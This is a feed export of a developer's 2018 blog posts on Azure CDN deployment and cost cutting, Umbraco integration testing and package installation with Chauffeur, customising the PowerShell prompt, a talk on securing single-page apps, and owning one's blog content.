via the Azure CLI:\n1 az cdn endpoint purge --profile-name <azure cdn name> --name <endpoint name> -g blog --content-paths <path(s) to purge> Or for our blog:\n1 az cdn endpoint purge --profile-name dddsydney-blog-cdn --name blog-dddsydney -g blog --content-paths "/*" Now I’m a little lazy and just purging the whole CDN (setting the content-paths to "/*") rather than just the paths to updated content (eg: the home page), but it’s fine for the small site footprints that we run.\nPurging sometimes fails Something that I’ve learnt along the way is that the purge doesn’t always work. I’m not sure why this is, by my belief is that sometimes it times out in VSTS. This is manifested by the release passing but no new content appearing (blogs not published, website changes not appearing, etc.).\nSo far the only solution to this I’ve found is to log into the Azure portal and run the purge again, sometimes a few times 😛. It’s annoying, especially when I want to go to bed, but I’ve not had time to try and diagnose the problem in more details.\nConclusion And that’s how we deploy the we assets for DDD Sydney into Blob Storage, in a way that provides us with easy roll-back of changes, and update the CDN to reflect the new content.\nNow I’m away that Microsoft released support for static websites in Azure as a feature, but at the time of writing it doesn’t support using an Origin Path so we can’t quite switch over yet. 
Hopefully in the future, but we’ll wait and see.\n", "id": "2018-07-05-automating-deployments-for-dddsydney" }, { "title": "Cutting Azure Costs", "url": "https://www.aaron-powell.com/posts/2018-06-21-cutting-azure-costs/", "date": "Thu, 21 Jun 2018 16:53:50 +0200", "tags": [ "azure", "dddsydney" ], "description": "How I went about slashing Azure costs for DDD Sydney from $60 to $1.50 per month", "content": " Only a couple of weeks after I posted this article Azure announced that they have support for static websites in preview. Obviously this supersedes what I do here, but it doesn’t make it any less accurate 😉.\nAs you likely know, I’m one of the organisers of DDD Sydney, a not for profit conference in Sydney. Being a not for profit I’m always looking at how we can slash our costs because every dollar counts and this year I decided to look at how we can slash our Azure costs.\nWhy do we need to do this? Well over the last few years we’ve starts to get compound costs of running the web assets. I like the idea of having all the previous years websites still up and running because it gives people a view on what we’ve done over the years as an event and it’s also useful as a marketing tool when we speak to sponsors.\nFor the last two years the DDD Sydney website has used a fork of the DDD Melbourne website which was an ASP.NET MVC application. Because I like simplicity it was deployed as an Azure AppService running the standard tier so we get custom domains (it was then backed by Azure Table Storage for the session submission and voting). This works fine, it’s costs ~$15 AUD per month to run and because of annoyances with banks it was going on my personal credit card (and I was too lazy to expense it back to SydDev Inc, our business entity).\nBut we’re starting to get growth in our web presence, this year would see a third AppService running and I wanted to do a blog using Hugo like mine which would be forth AppService. Now we’d be running a bit of $60 per month and it’s to the point that I can’t just absorb that cost and it’s starting to get a bit more pricey for us as an event to run.\nIt was time to cut costs!\nGoing static Realistically the DDD Sydney web presence is a static experience, nothing really changes on the website for a long time, we have session submissions for a few weeks (which we used Sessionize for this year) and then voting. Nothing that really needs a dynamic webserver to be running. Because of this I wanted move to some kind of a static site for it, but I’m also time poor (read: lazy) so I wanted to do it with minimal effort.\nConveniently the DDD Perth team were building a new website using React and I jumped at the idea to use it. But they were going to run it in an AppService which seemed overkill so we just use Server Side Rendering and generate a bunch of HTML pages (and the React over the top so it has some dynamic stuff to it).\nWhere to host? Now I’ve got a bunch of static assets where can I host them? I’d like to not open a new account somewhere so using Azure made sense (it’s already setup, it’s integrated with our O365 for security, etc.). 
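(A quick hedged aside, not from the original post: the Blob Storage approach discussed next boils down to a public container plus a bulk upload of the generated files. With the Azure CLI that’s roughly the following — the account name and source folder here are made up:)
az storage container create --name website --account-name dddsydneyweb --public-access blob
az storage blob upload-batch --destination website --source ./out --account-name dddsydneyweb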
I know that I can push all these files up to Azure Blob Storage, turn on anonymous authentication and voila, you’ve got a static website… running at a pretty horrible URL.\nMaking the URLs pretty So you’ve got your site running in Azure Blob Storage but the URL isn’t great, it’s definitely not dddsydney.com.au, so now we need to do something to fix that up.\nMy first thought was Azure Function Proxies, they are an easy way to front a route with a nice URL and it supports SSL + custom domains, so, win!\nBut it turns out to not be quite as simple as that. I can’t for the life of me work out how to do some decent wildcard mapping in the proxy definition to get the pages all mapped. My only solution was to create a proxy for each page which is less than ideal, especially when the blog is thrown into the mix.\nMy next thought was Azure CDN. Now I have zero experience in Azure CDN and in fact I couldn’t find anyone I know who had experience with Azure CDN (that I work with, or know externally, I’m sure there are people who use it 😛), so there’s no time like the present to learn it now is there!\nAzure CDN as it turns out is really just a front for two other CDN providers, Verizon and Akamai, but integrated into the Azure portal… sort of. I was going to need to use the Premium tier because I need to create custom rules, which means I’m using Verizon under the covers.\nI came across this article that goes through the basics of what I needed.\nThere are some gotcha’s, or at least things to be aware of when using Azure CDN, first is the rules ordering with forced HTTPS. You need to make sure you do your forced HTTPS before the URL rewrite. This took me a while to get sorted and it is a few hours turn around each time you change a rule, so a good one to catch early.\nHere’s what our rules look like (for the blog):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <rules schema-version="2" rulesetversion="15" rulesetid="753098" xmlns="http://www.whitecdn.com/schemas/rules/2.0/rulesSchema.xsd"> <rule id="1210941" platform="http-large" status="active" version="5" custid="84F94"> <description>HTTP -> HTTPS</description> <!--If--> <match.request-scheme value="http"> <feature.url-redirect code="301" pattern="/8084F94/blog-dddsydney/website/\\d*/(.*)" value="https://%{host}/$1" /> </match.request-scheme> </rule> <rule id="1210878" platform="http-large" status="active" version="0" custid="84F94"> <description>Wildcards</description> <!--If--> <match.always> <feature.url-user-rewrite pattern="/8084F94/blog-dddsydney/((?:[^\\?]*/)?)($|\\?.*)" value="/8084F94/blog-dddsydney/$1index.html$2" /> <feature.url-user-rewrite pattern="/8084F94/blog-dddsydney/((?:[^\\?]*/)?[^\\?/.]+)($|\\?.*)" value="/8084F94/blog-dddsydney/$1/index.html$2" /> </match.always> </rule> </rules> The next thing to be aware of is that setting up SSL takes ages, seriously, it’s around 8 hours to get a certificate deployed across all CDN nodes, but the beauty is that it’s free and I don’t have to manage cert expiry or anything!\nAnd don’t forget that you will often have to purge the cache, and that can take a while, which will then result in some slowness initially.\nConclusion Over the last two months, since we’ve moved to running the 3 websites and blog as static websites in blob storage using Azure CDN in front it’s cost a total of $3.26. 
Yep, I’m pretty happy with that!\nNow sure, I could’ve done a static website in AWS using S3 buckets, or using CloudFlare as the CDN provider, or GitHub pages, or, or, or… but they all would’ve required a set of new accounts that we don’t want to manage. DDD Sydney is low cost because we keep things light weight, and the more overhead I add through different platforms we have to push to, the more painful, and thus expensive, it become. So in the end getting it all setup in Azure is good for us, and really, it wasn’t that complex once I knew what I was doing.\n", "id": "2018-06-21-cutting-azure-costs" }, { "title": "Securing SPA's at NDC Security", "url": "https://www.aaron-powell.com/posts/2018-05-16-securing-spas-ndc-security/", "date": "Tue, 22 May 2018 15:25:18 +1000", "tags": [ "javascript", "speaking", "security", "pluralsight" ], "description": "Some info about my NDC Security talk on Securing Single Page Apps", "content": "Last week I had the pleasure of speaking at the first NDC Security Australia on the topic of Securing Single Page Applications.\nThis talk was an extension of a recent Pluralsight Play by Play that Troy Hunt collaborated on under the same topic.\nThe slides from the talk are available here.\nIn the talk I refer to this blog post about harvesting credit card details using npm packages and that you can use tools like Sonar, Retire.js and Snyk.io to track issues in your external dependencies.\nI also talked about creating keyloggers in CSS, using this PoC, but I might write a bigger piece about that in the future.\nI think this is a great talk, and a topic that is too often overlooked, so if you’d be interested in learning more get in touch and we’ll see if I can’t work out a time to present it again 😀.\n", "id": "2018-05-16-securing-spas-ndc-security" }, { "title": "Integration Testing Umbraco With Chauffeur", "url": "https://www.aaron-powell.com/posts/2018-03-22-integration-testing-umbraco-with-chauffeur/", "date": "Thu, 22 Mar 2018 10:51:52 +1100", "tags": [ "umbraco", "chauffeur" ], "description": "How to use Chauffeur to make it easier to create integration tests against the Umbraco API", "content": "One of the design goals of Chauffeur was to make it easy to extend, and that was the reason why I separated the core of Chauffeur out of the console application that you use to interact with it, resulting in the two NuGet packages. This means that really all the power of Chauffeur actually resides within the Chauffeur package and the runner really just creates an instance of the core class in there, UmbracoHost.\nSome time ago when I was trying to work out how to avoid some nasty regressions I hit across Umbraco versions I decided to create a suite of Integration Tests to go along with the Unit Tests that I already had in there, but in doing so I’d need to “start Umbraco”, but I didn’t want to be running IIS Express because it would just be really hard to interact with.\nI decided to see just how far I could push Chauffeur to help with this, I mean, I was already pretty familiar with how Umbraco works internally and that I was essentially starting Umbraco in the console application, so it got me thinking, could I start Umbraco in a test runner?\nLong story short, yes, yes I can run Umbraco in a test runner! I won’t go into the details of that here, it’s kind of convoluted what you need to do, but you can see on my CI server that it just works.\nLast month when I was up at uduf I was talking with people about testing Umbraco and how I was doing it with Chauffeur. 
One of the people I chatted to was Nathan Woulfe, author of Plumber, an Umbraco workflow tool. Together we’ve started working on Chauffeur integration for Plumber, but last week I saw him tweet this:\nAny #umbraco integration testing masters feel like helping out and sharing your ninja ways? https://t.co/8wwpLEHLDD\n— Nathan Woulfe (@nathanwoulfe) March 16, 2018 Well I saw a challenge, I know I can use Chauffeur to test Chauffeur, but could I use Chauffeur to test someone elses library?\nA night on the couch and a beer later I replied with this:\nHacked it a bit nastily tonight and got this going. It's all orchestrated by Chauffeur. pic.twitter.com/FUMANlb5X8\n— Aaron Powell (@slace) March 16, 2018 🎉\nAdmittedly it was pretty hacky to do so my next goal was to make it easier.\nIntroducing Chauffeur.TestingTools Today I published a preview build of a new NuGet package, Chauffeur.TestingTools, which will be part of the Chauffeur v1.1 release that I’m working on at the moment.\nThis NuGet package extracts the logic that I had in my Integration Tests into something that’s more generic (I even ported my Integration Tests to using it!).\nCreating Umbraco integration tests with Chauffeur.TestingTools So what do you get with this package? Right now you get an abstract class called UmbracoHostTestBase which you inherit from to:\nSet up a location for the SQL CE database that is unique to that test run Starts Chauffeur with fake input and output streams that you can interact with Let’s look at a basic test:\n1 2 3 4 5 6 7 8 9 10 public class HelpTests : UmbracoHostTestBase { [Fact] public async Task Help_Will_Be_Successful() { var result = await Host.Run(new[] { "help" }); Assert.Equal(DeliverableResponse.Continue, result); } } That. Is. All.\nThe UmbracoHostTestBase uses its constructor to setup everything because that’s how xunit works. Now I don’t dictate that you use xunit, if you use anything else I’d love to know how you go and if it doesn’t work so we can work together to make it compatible.\nThe class then exposes the Chauffeur “Host” as a Host property that you can execute Chauffeur commands against.\nWorking with IO Let’s say you want to read the output of your deliverable? Easy, there’s a TextWriter property that uses the MockTextWriter class I ship and it exposes all the messages written by WriteLineAsync as a collection.\nWhat if you want to simulate user input (reading from the console)? Well that’s covered too, the TextReader property exposes an instance of MockTextReader that you can call the AddCommand function to add user input to a stack. Be aware that it’s read in FIFO mode, so you’ll need to order your “reads” correctly.\nGotcha’s when doing Umbraco integration tests So there’s a few things that you need to do that are manual steps (or at least, manual at the moment):\nYou’ll need the Umbraco config files.\nThat stuff that lives in /config? Yeah you’ll need to copy those into your Integration Test project and then set them to be copied to the build output (Properties -> Copy to Output Directory), since Umbraco’s internal API’s will try and read those files.\nThis also means you kind of need a web.config, kind of. 
You don’t need the full Umbraco web.config, just the configSections definition for umbracoConfiguration, the umbracoConfiguration (pointing to the right config files), a connection string (SQL CE does work!), the DbProviderFactories and membership.\nCheck out my app.config in the integration tests of Chauffeur for an example of how it all works.\nUsing SQL CE SQL CE works nicely for integration tests, it’s how I do Chauffeur’s integration tests, and one of the things the base class does is setup a unique directory for the Umbraco.sdf file, so you don’t have clashes across multiple tests. But there is a manual step, you need to copy the amd64 and x86 directories from the UmbracoCms NuGet package (they are in the UmbracoFiles/bin folder) into your bin/Debug (or whatever the output folder of your tests is). If you don’t do this you’ll get a really obscure error message, and I can’t work out a simpler way to do it than manual copy/paste.\nWorking with the Umbraco Services It’s all good that you can run Chauffeur deliverables but what if you’re doing something with just plain Umbraco services, maybe reading DocTypes, creating content, etc.?\nAgain, I got you covered! Since the base class basically starts Umbraco you have access to all Umbraco services off their singletons. Here’s a really basic test that ensures you get all the standard data type definitions on install:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 public class NonChauffeurTests : UmbracoHostTestBase { [Fact] public async Task All_Data_Types_Installed() { // respond with "yes" to install SQL CE TextReader.AddCommand("y"); var result = await Host.Run(new[] { "install" }); var dataTypeDefinitions = ApplicationContext.Current.Services.DataTypeService.GetAllDataTypeDefinitions(); Assert.Equal(24, dataTypeDefinitions.Count()); } } Conclusion This is my first cut of trying to make it easier to integration test Umbraco and I’d really like to hear from anyone who has a crack at using this stuff!\n", "id": "2018-03-22-integration-testing-umbraco-with-chauffeur" }, { "title": "Content Ownership and Aggregation Sites", "url": "https://www.aaron-powell.com/posts/2018-03-04-content-ownership-and-aggregation-sites/", "date": "Sun, 04 Mar 2018 16:39:48 +1100", "tags": [ "random" ], "description": "Some more thoughts around content ownership.", "content": "Earlier this year I wrote about my thoughts on blogging and content ownership and I wanted to expand on it with the perspective on a type of publishing that’s becoming popular, aggregation sites.\nSites like hackernoon are gaining in popularity and for good reason, they are a great way to get content to a wider audience than just through your own blog (generally speaking). But there’s also a risk factor that I think people don’t realise with this and it’s something that I have been caught with, and that’s the lifetime of these sites.\nA number of years ago I pushed some content through an aggregation site that was affiliated with the company I worked for at the time. I found it very useful to help grow my own online profile as the company had a greater reach that I did.\nBut life carried on and I left that company, stopped publishing through the aggregation site and basically forgot about it.\nThat is, until last year when I was trying to recover my old posts. One piece of my digging landed me back on the aggregation site and I noticed something weird, the site was very different to when I was involved, very different indeed. 
Now over the years since I left that company they changed some of their focus, the devs came and went and all the people I worked with had moved on. As a result the site was no longer important to them and the domain had lapsed.\nSo what seemed to have happened was someone had purchased the lapsed domain and decided to create their company blog on it, but also restoring all the old content.\nAnd now we come to the issue that I have, to the causal reader it would appear that I had been contributing content to this company, a company I’d never been affiliated with. This is something I’m not cool with. Ultimately it was something I rectified with the new site owner pretty quickly, but that may not always be the case.\nConclusion And this is where we end our cautionary tail. I’m not here to say don’t use aggregation sites, they care very valuable for getting your reach out beyond what you might normally be able to achieve, but go into it with open eyes. What is the license of the content that you’re handing over? Have you thought about what would happen if the domain lapsed and someone else took it for their purposes?\nAt the end of the day this is your IP, be sure to own in.\n", "id": "2018-03-04-content-ownership-and-aggregation-sites" }, { "title": "Managing Packages With Chauffeur", "url": "https://www.aaron-powell.com/posts/2018-02-23-managing-packages-with-chauffeur/", "date": "Fri, 23 Feb 2018 14:43:05 +1000", "tags": [ "chauffeur", "umbraco" ], "description": "Searching and installing packages from the Umbraco feed with Chauffeur", "content": "Something that I’m really proud of with Chauffeur is how easy it is to extend, and I do a lot of little experiments to validate that the extensibility.\nLast year I was working on some Umbraco stuff and needed to install a package from the Umbraco package feed. Now normally I’d want to use NuGet to manage my external dependencies but with Umbraco you might require something that isn’t really a .NET distributable, it’s something that modifies Umbraco itself.\nNow this poses an issue for me with Chauffeur, I want to script everything, but installing a package from the package feed is a very manual process. So I decided to look into whether I could do it from Chauffeur.\nToday on the back of the Chauffeur 1.0 release I released v1.0 of Chauffeur.ExternalPackages!\nHere’s the plugin running, I’m searching for a PDF package, then downloading it and finally unpacking it (basically unzipping the archive).\nWhile the search is useful it’s more designed to be used with a delivery that scripts the download, unpack and eventual install. 
Here’s an example of installing the default starter kit:\nexternal-package starter-kit ced954d1-8c0f-4abe-bdda-99e7a787d052 external-package unpack ced954d1-8c0f-4abe-bdda-99e7a787d052 pkg package -f:$ChauffeurPath$\\ced954d1-8c0f-4abe-bdda-99e7a787d052-unpack external-package actions ced954d1-8c0f-4abe-bdda-99e7a787d052-unpack\\package.xml Let’s break it down:\nInstall a starter kit by the ID of it (you can find that by using external-package starter-kit) Unpacking the package based on its ID Using the “core” package deliverable to install it, but we’re using the -f flag to override the lookup path (since the zip is unpacked into a nested location) Running the package actions that are provided And there you have it, now you can easily install a package from the Umbraco package feed and run its package actions using Chauffeur!\n", "id": "2018-02-23-managing-packages-with-chauffeur" }, { "title": "Chauffeur goes v1", "url": "https://www.aaron-powell.com/posts/2018-02-23-chauffeur-goes-v1/", "date": "Fri, 23 Feb 2018 14:27:51 +1000", "tags": [ "chauffeur", "umbraco" ], "description": "After a long time Chauffeur v1.0 is out", "content": "🎉 TL;DR Chauffeur is finally at version 1.0, time to get updating! 🎉\n3 years and 11 months a go I initialised a git repo for what would become Chauffeur (the first actual code was not much later that day). Over the time I’ve chipped away at it slowly, added features, fixed bugs, etc.\nFor a while it’s been pretty stable, it did pretty much what I was wanting it to do, so really the only thing missing was the fact that it wasn’t a “v1 product”.\nWell today to celebrate the first Australian Umbraco festival, where I spoke about Chauffeur, I decided it was time to bite the bullet and call it v1.\nThe one big thing that I did add for the new release was a proper documentation website where I cover off getting started and different Deliverables that ship in the box.\nNext for Chauffeur is starting to work on some new features to make it even easier to get started and create incremental steps.\nHappy automating!\n", "id": "2018-02-23-chauffeur-goes-v1" }, { "title": "The Happy PowerShell Prompt", "url": "https://www.aaron-powell.com/posts/2018-01-30-the-happy-powershell-prompt/", "date": "Tue, 30 Jan 2018 13:40:38 +1100", "tags": [ "powershell", "random" ], "description": "Some fun with customising your PowerShell prompt.", "content": "Recently, for no particularly good reason, I decided to mess around with my PowerShell prompt and create what I’m dubbing the Happy PowerShell Prompt.\nDid you know that you can customise the PowerShell prompt like that? Well it turns out that it’s actually quite easy, PowerShell has a bunch of built in functions that you can override to change the operation, one such function is function:\\prompt, and overriding this will override your prompt!\nFirst off, before we pull anything apart maybe we should look at what we’re currently seeing, easiest way to do this is with Get-Content:\n1 PS C:\\> Get-Content function:\\prompt This should return you something like so:\n"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) "; # .Link # http://go.microsoft.com/fwlink/?LinkID=225750 # .ExternalHelp System.Management.Automation.dll-help.xml Now the top line is obviously the important stuff, that’s how your prompt works. 
You’ll see it’s an interpolated string that contains PS followed by the current path and the number of nested PowerShell sessions you’re in (to be honest I didn’t know what it was until I started reading about Host.EnterNestedPrompt) which I won’t go into here.\nOk, well now we can start futzing with it:\n1 2 PS C:\\> $prompt = { "Aaron Rocks $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) " } PS C:\\> Set-Item -Path function:\\prompt -Value $prompt First you need to define a script blog that contains your new prompt value, and then we use the Set-Item to set the value of function:\\prompt.\nTa-da! You’ve now got yourself a prompt that tells you something important, that I rock!\nBut unfortunately that will only work for the current PowerShell session, and we want something persistent. Time to crack open your PowerShell profile. First thing you need to do is find out if you have a PowerShell profile:\n1 2 3 4 5 Aaron Rocks C:\\> Test-Path $profile False Aaron Rocks C:\\> New-Item -Path $profile -ItemType File -Force Aaron Rocks C:\\> $profile C:\\Users\\ContainerAdministrator\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1 So here I find that the profile didn’t exist so we created a new one which lives in your %USERPROFILE%\\Documents\\WindowsPowerShell folder (I’m doing it inside a Docker container, because, why not 😛).\nNow grab your code from above, paste it in and launch a new PowerShell session, your profile is applied and you’ll always see that I rock!\nMaking a happy prompt Ok, so maybe a prompt telling you that Aaron Rocks isn’t going to work for everyone, let’s have a look at how to create the Happy PowerShell Prompt from above.\nFor it I have 3 things happening:\nI show the current path I show the git repo status, if I’m in a folder with a git repo Show something positive Well we know how to get the current path, that’s easy, how about the git info? For that I’m using the excellent Posh-Git module, which if you’re using git on Windows and not using Posh-Git, you’re missing out. Posh-Git in fact will want to modify your prompt for you anyway, but unfortunately it doesn’t play well with what I’m going to do, so instead I’m going to manually invoke it.\nFirst things first I need to know if I’m in a git repo on disk, to do that I’ll just make the assumption that if there’s a .git repo in the current folder, or any of its parents, I’m in a git repo. For that I’m going to create 2 functions, one that imports Posh-Git, and one that checks for a .git folder:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $gitLoaded = $false function Import-Git($Loaded){ if($Loaded) { return } Import-Module Posh-Git > $null return $true } function IsGitRepo($Path) { if (Test-Path -Path (Join-Path $Path '.git') ) { $gitLoaded = Import-Git $gitLoaded Write-VcsStatus return } $SplitPath = split-path $path if ($SplitPath) { IsGitRepo($SplitPath) } } I’m also tracking a variable of whether I loaded Posh-Git already so I don’t load it multiple times. Now you’ll notice inside the IsGitRepo function I call Write-VscStatus. This is a function provided by Posh-Get and it’ll output the status like you see in my path above at the current location, so all good, we’re getting our git status!\nFinally I’m going to create an array of curated happy emoji, use the Get-Random PowerShell function to select one and then append it to my prompt. 
Here’s how it all looks:\n1 2 3 4 5 6 7 8 9 10 11 12 13 [ScriptBlock]$Prompt = { $host.UI.RawUI.WindowTitle = Microsoft.PowerShell.Management\\Split-Path $pwd.ProviderPath -Leaf $Host.UI.RawUI.ForegroundColor = "White" Microsoft.PowerShell.Utility\\Write-Host $pwd.ProviderPath -NoNewLine -ForegroundColor Green checkGit($pwd.ProviderPath) $happyPrompts = @('🍺'; '😀'; '🤜'; '🎉'; '🤟'; '✔'; '👌'; '🌈'; '❤'; '💯'; '🆗'; '🗨';) $prompt = $happyPrompts[(Get-Random -min 0 -max ($happyPrompts.Length))] Microsoft.PowerShell.Utility\\Write-Host "`n$prompt " -NoNewLine -ForegroundColor "DarkGray" return " " } Set-Item -Path function:\\prompt -Value $Prompt -Options ReadOnly To get the line break I’m inserting a `n before the emoji.\nAnd there you have it, your very own happy prompt.\nA word of caution - if you make your prompt too complex and run commands in it you can slow down your shell, remember this executes each time. Also, be careful you don’t break exit codes 😉.\n", "id": "2018-01-30-the-happy-powershell-prompt" }, { "title": "Learn About Umbraco Continuous Delivery at uduf", "url": "https://www.aaron-powell.com/posts/2018-01-21-learn-about-umbraco-cd-at-uduf/", "date": "Sun, 21 Jan 2018 13:18:25 +1100", "tags": [ "umbraco", "chauffeur", "speaking" ], "description": "An overview of my upcoming talk at Umbraco Down Under Festival", "content": "Have you heard, there’s an Umbraco conference coming to Australia, Umbraco Down Under Festival, aka uduf! I’m really excited for this, I’ve been wanting to see more Umbraco community events happening in Australia, so to see a fully-fledged conference happening is damn cool.\nI’m also excited to be speaking at this inaugural event, and speaking about an aspect of Umbraco that I’m very passionate about, how you do continuous delivery.\nWhat can you expect in the talk? For this talk I’m going to look back at how we deploy Umbraco solutions and talk about some of the approaches that I’ve used over the years I’ve worked with Umbraco, to frame the context of why it’s a hard problem to solve.\nI’m then going to look at how we can deploy Umbraco projects in an automated fashion. I’ll look at a couple of techniques, the pros and cons of each of them in an attempt to ensure that the audience is informed about what approach will work best for their organisation.\nNaturally I’ll talk about Chauffeur and I’ve got some cool stuff around Chauffeur that I’ll unveil at the event.\nCan’t wait to see you there!\n", "id": "2018-01-21-learn-about-umbraco-cd-at-uduf" }, { "title": "On blogging and content ownership", "url": "https://www.aaron-powell.com/posts/2018-01-15-blogging-and-content-ownership/", "date": "Mon, 15 Jan 2018 16:43:07 +1100", "tags": [ "random" ], "description": "My thoughts about getting into blogging and how to manage your content", "content": "Recently the question came up within Readify about how to get into blogging. As someone who blogs (obviously) and has blogged for a while now, I decided to share my thoughts on the topic. In fact it’s a question that I’ve been asked a few times, I’d been considering writing a post about it and someone suggested that I do it, so it’s time for a meta post on blogging on my blog.\nWhy blog? Plenty of people have written blog posts about why it is important for your career to have a blog, how it’ll give you a leg up in the job market, etc. but in my opinion most of this is a load of rubbish. 
All of this focuses the conversation in the wrong way, what can you push out to everyone else, not what can you do for you.\nSee for me, blogging is about writing down something that I want to write down, not what others want me to write down, and that’s why on this blog you’ll see everything from JavaScript to Docker, things that you can use it production to things you really shouldn’t use in production (or, maybe anywhere!).\nIf you write something because you want to write it and you enjoyed writing it, then who’s to say it wasn’t valuable? You’re not measured by the number of page views in Google Analytics, the number of retweets the post gets or anything thing other than “did I have fun?”.\nWhat do I blog about? Admittedly, this is pretty intertwined with the pervious point, but don’t feel like you need to have a theme to your blog. I originally did start that way, hence the name LINQ to Fail, a lot of my early work was in LINQ and looking at how to do things with it, but the risk of a theme is cornering yourself in where the blog will go. It’s nearly a decade since I started blogging and if I was still trying to focus on LINQ there’d be a heck of a lot less posts 😛.\nAnd your career with grow and evolve, what I was doing 10 years ago is very different to what I’m doing now, so again that feeds into the over time evolution of your blog.\nNow sure, you don’t want a huge swing post-to-post of what you’re blogging about, having trends is a good idea. My blog is heavily swayed in the JavaScript and Umbraco space, but I’ll still blog about Docker if that’s something that’s taking my fancy at the time.\nWhat platform should I use? opens can of worms and waits\nOk, so this is something that everyone will have a different opinion on, so feel free to skip!\nTL;DR Markdown files in a git repo with a static site generator like Jekyll, Hugo, etc.\nLong form answer\nLike I said, I’ve been blogging for almost 10 years, but I’m not 100% sure when I started (and I’ll get to that shortly).\nWhen I started I created a website in Umbraco, wrote some C# Web Service and cobbled together some JavaScript to call them so that I could make a cool AJAX-y site. This was hosted on a webserver at the company I worked, with the database running on one of their SQL Servers.\nI’d occasionally open up the codebase on my laptop (it wasn’t in source control!) and edit the code, I broke the comments engine for a while doing this, and then copy the files to production.\nI realised how terrible this was for SEO I rewrote the ASPX pages, showed the latest posts on the home page and I think chucked in a bunch of <UpdatePanel>’s to keep up the awesome AJAX.\nWhen I moved to Sydney I took my website with me, I backed up the SQL database, copied the files via FTP and then put them onto my new companies servers.\nAfter a while of rewriting the page templates I decided to move off Umbraco and into a dedicated blog engine that Paul Stovell had written, and we’d eventually open source as FunnelWeb. 
Now guess what, I needed to write a content migrator to get the content from Umbraco and into FunnelWeb, and from HTML to Markdown (ok, I didn’t actually do that, I just dumped HTML in the Markdown).\nAnd thus the first of three migration engines I’ve written started.\nI also decided it was time to stop mooching off my company and pay for hosting (also, I’d moved to Readify who didn’t have a webserver I could use 😛), so I found a company I liked and put it on their web/SQL Server (this was pre-cloud days, no Azure for me).\nAnd this worked for a while for me, but I started to hit a problem, I wanted to write posts offline, something you can’t do with an online-only editing experience.\nThis was when I first decided to move to a static site generator, so I wrote a migrator to convert the SQL-stored content into flat Markdown files, picked a Node.js-based static site generator, picked a template and got going (I also moved hosting, no need to pay for a SQL DB anymore!).\nUnfortunately I made a poor decision in the static site generator I chose to use, and it was pre-yarn days so I would clone onto a new machine, npm install only to find everything broken again. This caused my blogging to suffer, the constant maintenance I needed to just get the site running to preview a post meant I was less inclined to post.\nAnd thus began the last of my great migrations, this time to a different static site generator. This time I picked one that had a bigger community but more importantly it has no external dependencies (seriously, the binary for Hugo is in my git repo!) so I can clone and run locally with no effort.\nIt’s your content, it’s your responsibility This is something that it took me a long time to learn, and I learnt it the hard way. Over the years of using a hosted platform, not a SaaS platform but something akin to hosting WordPress yourself, is that you are responsible for owning that content. Sure you’ve got SLA’s in place around the DB being backed up, but have you tested it? What happens if your hosts DB server dies? What happens if something gets corrupted in the DB? Can you get your content back?\nI learnt this the hard way. I can tell you that I started blogging approximately 10 years ago. I know I published a post on the 6th June 2008, but I don’t think that’s my first blog post, but I don’t know for certain. Late last year while going through some old OSS projects I stumbled on a link to a post on my website that 404’ed. Now this wasn’t surprising, I’ve changed URL schemes many times, but I couldn’t find a blog of that title anywhere in my repo. Then I started looking at the time stamps on my posts, there were some huge gaps, gaps that didn’t make sense.\nAnd this is where I found out that I was missing a lot of my early content. In fact I was missing pretty much all content from 2008 and the first half of 2009!\nSo I had a mild freak-out, I didn’t have DB backups anywhere and it’s not like I have the DB on these hosts anymore (if they even exist!), so how was I going to recover this lost content? Well thankfully a bit of poking around in wayback machine I was able to find a bunch of the old posts (~70) that I didn’t previously have.\nStatic sites ftw Throughout this process I’ve come to realise that a static site is just the best way to go about managing your content. 
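(For anyone who hasn’t used a static site generator, the day-to-day loop with something like Hugo — which this site runs on — is only a few commands; a rough sketch rather than a tutorial:)
hugo new posts/my-new-post.md   # creates a Markdown file, marked as draft: true in its front matter
hugo server -D                  # preview the site locally, drafts included
hugo                            # build the publishable HTML into ./public, ready to deploy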
This puts you in control: how it’s published, where it’s published, how you manage the workflow of draft -> release, all that stuff.\nSaaS platforms come and go, and the last thing you want to be doing is trying to pull your content out before somewhere is shut down.\nAnother advantage of a static site is that you aren’t just restricted to it being a blog, I can easily host things like demo code for articles, or just things I want to play around with.\nMonetisation While I’m on the train of dissing the way people blog I’m going to talk about ads on blogs. You can run an Azure AppService for ~$10 per month (Basic), which is nothing, or you can easily run it for free on places like Heroku or even out of an S3 bucket. So the idea of monetising just seems silly. Maybe when I get to the traffic levels of someone like Scott Hanselman or Troy Hunt I might think differently, but really, invest in yourself. And anyway, most people have ad-blockers on these days so is it really going to do much?\nConclusion So this post was a bit musing, a bit ranting, but mostly some of my thoughts on how and why I blog.\n", "id": "2018-01-15-blogging-and-content-ownership" }, { "title": "2017 - A year in review", "url": "https://www.aaron-powell.com/posts/2018-01-11-2017-a-year-in-review/", "date": "Thu, 11 Jan 2018 09:25:41 +1100", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "Another year has come and gone and with that it’s time for everyone to write their ‘The year that was’ posts. I missed doing it in 2016 but thought that for 2017 I’d do one as it was an interesting year for me.\nA quick look at my blog history shows that I did a total of 21 posts in 2017, which is not bad given that I didn’t start blogging again until I rebuilt my site in July!\nThis does mean that I didn’t really talk about the first half of the year much, and who knows what happened then! Well one thing that happened was my first trip to NDC London to present my Redux, beyond React and The Beauty of Stupid Ideas talks. The other was working on a very large program of work for a multinational organisation that saw me spending a lot of time in meetings at all hours of the day.\n2017 also saw me get deeper into the PC role I was promoted to in 2016 at Readify but then during the latter half of the year I shifted across to the sales team to broaden my skills across the business.\nI spent more time in React, partially because we were using it on this large project and partially because I enjoyed it. One question I was pondering was how to best use SVGs with React which led to these two posts that show how easy animating SVGs with React can be.\nI continued my involvement with DDD Sydney, joined the agenda committee for NDC Sydney (and spoke there too) and of course headed down for DDD Melbourne.\nThe other bit of tech that I played around with, and used to indulge my stupid ideas, was Docker. I gave a talk called Docker, FROM scratch at DDD Melbourne and NDC Sydney that I’m quite proud of (and have received very positive feedback on), and I then looked at really crazy uses of Docker like running VS Code on Linux from WSL from Windows 10 which may not be useful to anyone unless you have to debug PowerShell on Linux.\nOpen Source was a big part of the latter half of the year, with a major update to my PowerShell node version manager and 